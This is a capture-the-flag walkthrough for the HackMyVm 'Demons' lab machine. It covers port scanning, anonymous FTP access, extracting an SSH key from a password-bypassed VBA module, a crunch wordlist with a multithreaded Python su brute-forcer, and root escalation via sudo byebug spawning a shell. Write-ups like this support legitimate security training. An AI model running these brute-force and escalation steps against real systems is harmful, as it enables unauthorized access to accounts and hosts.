HackMyVm Demons Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Demons
Find IP of the machine.
~ sudo arp-scan --interface eth1 192.168.56.0/24
...
192.168.56.218 08:00:27:71:4c:b6 PCS Systemtechnik GmbH
Scan ports.
~ nmap -sV -sC -p- 192.168.56.218 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
Nmap scan report for 192.168.56.218
Host is up (0.00090s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
| 256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
|_ 256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: DemonsCloseCall
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelLogin ftp anonymous, download DemonsVBAMacroTools.mdb.
ftp> cd .toolsHidden
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Sep 16 15:17 .
drwxr-xr-x 3 0 115 4096 Sep 16 15:18 ..
-rw-r--r-- 1 0 0 55 Sep 10 17:21 .what
-rw------- 1 1000 1000 12018 Sep 10 17:19 DemonsCellsDogma.xlsx
-rwxrwxrwx 1 1000 1000 339968 Sep 16 15:17 DemonsVBAMacroTools.mdbUse Access to open it, there is a VBA module which is password protected.
[image-20210923200140504.png]
Google the way to bypass the password. Then we can view the source code.
[image-20210923200334764.png]
Save the ssh key to key.txt.
Enum port 80. At http://ip/hell, get 2 usernames.
[image-20210923200603370.png]
Try login as aim with the private key.
~ ssh aim@192.168.56.218 -i key.txt
Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
aim@Demons:~$ id
uid=1001(aim) gid=1001(aim) groups=1001(aim)Found an image in /home/aim, named key8_8.jpg. This the the hint for password of another user agares.
[image-20210923200722887.png]
Check the keyboard image, "34odfnm" is different. This means the dic contains only these 7 letters/numbers.
8_8 may means password length is 8. We should use "crunch 8 8"
So, first we generate a dic with crunch, which contains 5764801 words.
~ crunch 8 8 dfnmo34 > tmp.txt
0
Crunch will now generate the following amount of data: 51883209 bytes
49 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 5764801Because the password contain's all 7 letter/numbers, so there is one and only one letter/number appears twice.
Then we use a script to make the dic smaller. (Thanks avijneyam#8394 for the script )
```bash
with open("tmp.txt") as f:
lines = f.read().splitlines()
data = []
for line in lines:
uline = list(set([i for i in line]))
counts = []
for char in uline:
counts.append(line.count(char))
counts.sort()
if counts[-1] == 2 and counts[-2] == 1:
data.append(line)data = "\n".join(data)
with open("dic.txt", "w") as f1:
f1.write(data)
The new dic contains only 141119 words. (Also a big one.)
```bash
~ wc -l dic.txt
141119 dic.txtThen we need to brute force su to get the right password of agares.
There is a tool named sucrack at github.
https://github.com/hemp3l/sucrack
sucarck takes about 18 mins. (With 100 threads. Too many threads causes error.)
aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt
password is: xxxxxxxx
real 18m19.760s
user 11m7.012s
sys 4m59.095s
We can also make a python script to do the bruteforce. But the speed is mush slower than sucrack.
#!/usr/bin/python3
import threading
from subprocess import PIPE,STDOUT,Popen
threads = []
t_nums = 100 #number of threads
global correct_pass
correct_pass = ""
global current #current count of passwords
current = 0
global total #total count of passwords
total = 0
def crack_thread(*pass_list):
#threads of cracking su
global correct_pass
global current
global total
for pwd in pass_list:
if(len(correct_pass) > 0): #correct_pass has been found, exit thread
return
current += 1
print(f"{current}/{total}",end="\r")
p = Popen(['su','agares'],stdin=PIPE,stdout=PIPE,stderr=STDOUT)
try:
res=p.communicate(f"{pwd}\nid".encode("utf-8"))
except:
p.terminate()
continue
if(str(res).find("agares")) != -1:
print(f"\nPassword is {pwd}\n")
correct_pass = pwd
return
return
with open('mini.txt','r') as passfile:
passes = passfile.readlines()
total = len(passes)
t_size = total // t_nums #passwords count of each thread
t_last = total % t_nums #if mod is not 0, there will be another thread
for i in range(t_nums):
passblk = passes[i*t_size:(i+1)*t_size]
t=threading.Thread(target=crack_thread,args=passblk)
threads.append(t)
if t_last>0:
passblk = passes[t_size*t_nums:]
t=threading.Thread(target=crack_thread,args=passblk)
threads.append(t)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()aim@Demons:~$ time python3 mt.py
126758/141120
Password is xxxxxxxxreal 185m22.898s
user 98m29.009s
sys 62m7.093s
Check sudo -l as user agares.
agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L'utente agares può eseguire i seguenti comandi su Demons:
(ALL : ALL) /bin/byebug
It's easy to get root now.
agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb
[1, 1] in /home/agares/tmp.rb
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)
Demons